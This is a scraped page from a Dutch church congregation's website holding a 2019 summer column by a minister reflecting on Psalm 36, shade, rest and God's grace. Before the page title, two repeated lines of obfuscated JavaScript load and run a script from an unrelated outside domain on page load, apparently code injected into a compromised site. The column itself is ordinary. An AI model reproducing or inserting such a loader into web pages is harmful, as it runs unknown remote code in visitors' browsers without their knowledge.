;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Simmer - PKN Damwâld

Simmer

Gepubliceerd op: maandag 8 juli 2019

De zomer is begonnen en al een paar keer haalden we de 30 graden. Heerlijk, hoewel vrij snel merken we dat we de hitte niet zo gewend zijn en koelte zoeken. Pas dan begrijpen we hoe belangrijk de schaduw is. Wie op vakantie gaat en op een hete zomerdag de koelte van een oude kerk in loopt merkt al gauw hoe heerlijk het voelt.

In Psalm 36 wordt gezongen over het schuilen in Gods schaduw. “Hoe kostbaar is uw liefde, God! In de schaduw van Uw vleugels schuilen de mensen” (vers 8). Het schuilen bij de Here is niet alleen een gelovig aannemen, maar wordt ook ervaren als iets dat goed voelt.
Het is geen wonder dat mensen steeds weer op de smaak komen van Gods genade. In Psalm 36,9 staat het zo: “ zij laven zich aan de overvloed van uw huis, U lest hun dorst met een stroom van vreugden”.

In de zomer proberen we vaak even op te laden op een vakantieplek, of thuis meer rust te vinden en wat daagjes op weg je gaan. Ik hoop dat we dan ook de leegte en rusteloosheid vullen met Gods genade en Zijn vreugde. Want hoe ver we ook gaan en hoe mooi het ook is, bij God is de bron van leven en echt levensherstel. “Want bij U is de bron van het leven, door Uw licht zien wij licht” (Ps.36,10).

Ik wens ieder een goede zomertijd om op adem te komen door Gods genade.

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns